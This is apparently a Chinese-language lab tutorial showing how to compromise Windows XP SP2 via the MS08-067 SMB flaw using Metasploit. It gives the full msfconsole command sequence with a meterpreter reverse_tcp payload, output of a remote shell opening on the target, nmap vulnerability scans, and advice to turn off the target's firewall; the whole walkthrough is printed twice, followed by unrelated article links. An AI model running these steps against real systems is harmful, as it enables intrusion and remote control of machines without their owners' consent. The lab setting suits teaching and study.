Metasploit 攻击winXP
2016-01-06 17:06
495 查看
本次实验会用到以下资源:
Kali linux 镜像
windows XP SP2 镜像
进入kali linux进行渗透:
# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST TARGETIP
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST YOURIP
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.71.105:4445
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 1 opened (192.168.71.105:4445 -> 192.168.71.112:1036) at 2016-01-06 14:06:04 +0800
meterpreter > shell
Process 392 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
以上就是渗透过程,如果最终没有显示出 meterpreter,则说明渗透不成功,可以参考以下步骤进行:
扫描靶机漏洞端口是否可以攻击
nmap -p 445 -script smb-check-vulns -script-args=unsafe=1
TARGETIP
输出结果:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 12:35 HKT
Nmap scan report for localhost (192.168.71.113)
Host is up (0.00039s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:BE:48:2C (VMware)
Host script results:
| smb-check-vulns:
| Conficker: UNKNOWN; got error SMB: ERROR: Server returned NT_STATUS_PIPE_NOT_AVAILABLE too many times; giving up.
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
结果中并没有 MS08-067: VULNERABLE,所以无法利用,注意本实验用的是MS08-067漏洞,windows xp sp2是有的。
换成 xp sp2 继续扫描:
nmap -p 445 -script smb-check-vulns -script-args=unsafe=1
TARGETIP
输出结果:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 14:00 HKT
Nmap scan report for localhost (192.168.71.112)
Host is up (0.00018s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:0C:29:06:7B:67 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.10 seconds
如果端口状态为 filtered,则是被防火墙屏蔽,此时我们可以关闭靶机的防火墙,继续扫描:
输出结果:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 14:04 HKT
Nmap scan report for localhost (192.168.71.112)
Host is up (0.00024s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:06:7B:67 (VMware)
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
Nmap done: 1 IP address (1 host up) scanned in 6.11 seconds
漏洞可用,此时可按照上面的步骤进行渗透。
Kali linux 镜像
windows XP SP2 镜像
进入kali linux进行渗透:
# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST TARGETIP
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST YOURIP
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.71.105:4445
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 1 opened (192.168.71.105:4445 -> 192.168.71.112:1036) at 2016-01-06 14:06:04 +0800
meterpreter > shell
Process 392 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
以上就是渗透过程,如果最终没有显示出 meterpreter,则说明渗透不成功,可以参考以下步骤进行:
扫描靶机漏洞端口是否可以攻击
nmap -p 445 -script smb-check-vulns -script-args=unsafe=1
TARGETIP
输出结果:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 12:35 HKT
Nmap scan report for localhost (192.168.71.113)
Host is up (0.00039s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:BE:48:2C (VMware)
Host script results:
| smb-check-vulns:
| Conficker: UNKNOWN; got error SMB: ERROR: Server returned NT_STATUS_PIPE_NOT_AVAILABLE too many times; giving up.
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
结果中并没有 MS08-067: VULNERABLE,所以无法利用,注意本实验用的是MS08-067漏洞,windows xp sp2是有的。
换成 xp sp2 继续扫描:
nmap -p 445 -script smb-check-vulns -script-args=unsafe=1
TARGETIP
输出结果:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 14:00 HKT
Nmap scan report for localhost (192.168.71.112)
Host is up (0.00018s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:0C:29:06:7B:67 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.10 seconds
如果端口状态为 filtered,则是被防火墙屏蔽,此时我们可以关闭靶机的防火墙,继续扫描:
输出结果:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 14:04 HKT
Nmap scan report for localhost (192.168.71.112)
Host is up (0.00024s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:06:7B:67 (VMware)
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
Nmap done: 1 IP address (1 host up) scanned in 6.11 seconds
漏洞可用,此时可按照上面的步骤进行渗透。
相关文章推荐
- Asp.net自定义单选复选框控件
- java中HaspMap的使用
- 开发ASP.NET MVC 开发名片二维码生成工具 (原创)
- ASP.NET MVC 入门10、Action Filter 与 内置的Filter实现(实例-防盗链)
- asp.net调用windows服务
- ASP.NET MVC4计划任务实现方法(定时执行某个功能)
- asp.net获取ListView与gridview中当前行的行号
- [Jasper使用总结]iReport报表设计-动态列实现
- Aspxspy中提取执行cmd命令的代码
- asp.net cookie和session的详细使用
- 基于ASP.NET MVC(C#)和Quartz.Net组件实现的定时执行任务调度
- Asp.net 后台添加Meta标签方法
- asp.net获取ListView与gridview中当前行的行号
- Android与Asp.net webApi参数传递
- 基于RaspberryPi 2 model B 的游戏机
- [Spring] AOP, Aspect实例解析
- ASP.NET MVC Html.BeginForm 设置 timeout
- Bear and Raspberry
- Asp.Net MVC 使用FileResult导出Excel数据文件
- Asp.net WebAPI